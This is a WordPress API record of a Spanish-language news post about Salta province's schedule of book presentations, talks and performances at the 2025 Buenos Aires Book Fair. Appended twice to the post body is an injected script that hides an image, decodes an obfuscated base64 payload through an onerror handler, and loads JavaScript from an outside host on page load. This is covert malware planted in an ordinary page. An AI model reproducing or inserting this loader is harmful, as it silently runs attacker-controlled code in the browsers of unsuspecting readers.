{"id":5100,"date":"2025-04-28T10:12:15","date_gmt":"2025-04-28T13:12:15","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5100"},"modified":"2025-08-13T23:35:05","modified_gmt":"2025-08-14T02:35:05","slug":"literatura-musica-y-diversidad-la-propuesta-saltena-en-la-feria-del-libro","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5100","title":{"rendered":"Literatura, m\u00fasica y diversidad: la propuesta salte\u00f1a en la Feria del Libro"},"content":{"rendered":"\n<p><strong><em>La Provincia volvi\u00f3 a La Rural con una agenda repleta de actividades culturales y literarias para todo p\u00fablico.<\/em><\/strong><\/p>\n\n\n\n<p>Salta es&nbsp;nuevamente protagonista en la 49\u00b0 edici\u00f3n de la Feria Internacional del Libro de Buenos Aires, que se desarrollar\u00e1 hasta el 12 de mayo de 2025 en el Predio Ferial La Rural. Con una agenda rica y diversa, la provincia est\u00e1 presente en el Stand Norte Cultura, ubicado en el pabell\u00f3n Ocre, compartido con Tucum\u00e1n, Jujuy y Catamarca. Este espacio conjunto busca ofrecer un caleidoscopio cultural del norte argentino, con la participaci\u00f3n destacada de m\u00e1s de 200 escritores salte\u00f1os, 250 novedades editoriales y m\u00e1s de 1.100 libros a la venta.<\/p>\n\n\n\n<p>Este&nbsp;lunes 28 incluir\u00e1 la presentaci\u00f3n del libro Los investigadores, de Patricia Fr\u00edas, y la novela El Inca Paz, por su autor Eduardo Ceballos. Ma\u00f1ana&nbsp;martes 29 ser\u00e1 el turno de Fray Bernardino Nardini, de Rodrigo Bravo Herrera, y Apuntes hist\u00f3ricos sobre Salta, presentado por Atilio Cornejo.<\/p>\n\n\n\n<p>El mi\u00e9rcoles 30 llegar\u00e1 cargado de actividades vinculadas a la identidad ling\u00fc\u00edstica y cultural: desde el evento \u201cHip Hop: palabra originaria\u201d, de Herliz Amaru Guti\u00e9rrez, hasta la presentaci\u00f3n del alfabeto wich\u00ed-espa\u00f1ol por Lorena Leonhardt. Tambi\u00e9n se compartir\u00e1 el libro Los cuentos kollas de Santusa Iskay, Haniunkataya y Ricardo Folser, con Milagro Dom\u00ednguez y Emiliano Ruiz D\u00edaz. M\u00e1s tarde se desarrollar\u00e1 el conversatorio Salta provincia pluriling\u00fce, con participaci\u00f3n de Dom\u00ednguez, Daniel Huircapan y Ana Carolina Hecht, coordinado por \u00c1lvaro Guaym\u00e1s y Facundo Sinatra Soukoyan. La jornada culminar\u00e1 con la presentaci\u00f3n de D\u00fao Salte\u00f1o: memorias de largos caminos, de Ana Falc\u00f3n y Lucas J. Fern\u00e1ndez.<\/p>\n\n\n\n<p>En mayo, la programaci\u00f3n contin\u00faa con un conversatorio sobre educaci\u00f3n intercultural el jueves 1, seguido de un espect\u00e1culo de m\u00fasica y poes\u00eda con Juan Ahuerma y Rodrigo Moro. El viernes 2, Carmen Luc\u00eda Gonz\u00e1lez llevar\u00e1 adelante juegos did\u00e1cticos de matem\u00e1tica. Ese d\u00eda tambi\u00e9n se presentar\u00e1 una tertulia literaria organizada por la Editorial Juana Manuela, con tres g\u00e9neros y autores, junto con los libros Niac tit\u00e9, el titaterrestret\u00e9, de Maria del Milagro Herrera, y una antolog\u00eda po\u00e9tica con m\u00fasica en vivo coordinada por Lucho Ponce.<\/p>\n\n\n\n<p>El s\u00e1bado 3 incluir\u00e1 la historia de la \u00faltima ciudad fundada por espa\u00f1oles en Am\u00e9rica, Colonia Santa Rosa, de Horacio S\u00e1nchez, la novela Background de Juan P\u00e1ez, y el poemario P\u00f3stuma. Desde mi sepultura, nuevamente de Herrera. El domingo 4 se presentar\u00e1 Vamos a la ronda, de Pablo Chireno, y la Antolog\u00eda Po\u00e9tica &#8211; Voces de Salta, seguida por Coronel Mayor Bonifacio Ruiz de los Llanos, el intr\u00e9pido, de Marcelo Ruibal.<\/p>\n\n\n\n<p>El lunes 5, el grupo Micr\u00f3sfera y la escritora Mar\u00eda Bel\u00e9n Alem\u00e1n, junto a Jos\u00e9 Luis Bulacio, presentar\u00e1n No te distraigas. El martes 6, Hugo Solorza hablar\u00e1 sobre El campamento principal de Mart\u00edn Miguel de G\u00fcemes. El jueves 8 ser\u00e1 el turno de Carlos M\u00fcller con su novela Siwok Wet, la casa del p\u00e1jaro carpintero, y Roberto Dib Ashur con Propuesta para un nuevo r\u00e9gimen de coparticipaci\u00f3n federal.<\/p>\n\n\n\n<p>El viernes 9, Fabio Mart\u00ednez realizar\u00e1 una actividad de \u201clecturas sonorizadas\u201d, mientras Raquel Espinosa presentar\u00e1 En la piel del otro, y H\u00e9ctor Hip\u00f3lito Ahumada compartir\u00e1 Memorias de un guachipe\u00f1o, junto a una reflexi\u00f3n sobre inteligencia artificial. El s\u00e1bado 10, Brote Po\u00e9tico ofrecer\u00e1 un espacio para Mujeres poetas de Salta y m\u00e1s all\u00e1, y Daniela Urgel disertar\u00e1 sobre energ\u00eda y conciencia ambiental. Cerrar\u00e1 la jornada la editorial Olivia con Contanos tu historia, una actividad sobre autoras en movimiento y econom\u00eda familiar.<\/p>\n\n\n\n<p>El domingo 11 cerrar\u00e1 la presencia de Salta con la presentaci\u00f3n del libro Mi dinero, mi libertad, de Carolina Am, y el recital po\u00e9tico-musical Barba &amp; Aj\u00ed, con Rodrigo Cocha. As\u00ed, la provincia despliega una presencia vigorosa y multifac\u00e9tica, reforzando su compromiso con la cultura, la literatura y el encuentro de saberes en uno de los eventos m\u00e1s importantes del continente.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Provincia volvi\u00f3 a La Rural con una agenda repleta de actividades culturales y literarias para todo p\u00fablico. Salta es&nbsp;nuevamente protagonista en la 49\u00b0 edici\u00f3n de la Feria Internacional del Libro de Buenos Aires, que se desarrollar\u00e1 hasta el 12 de mayo de 2025 en el Predio Ferial La Rural. Con una agenda rica y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5101,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,16],"tags":[],"class_list":{"0":"post-5100","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5100"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5100"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5100\/revisions"}],"predecessor-version":[{"id":6508,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5100\/revisions\/6508"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5101"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5100"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5100"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5100"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}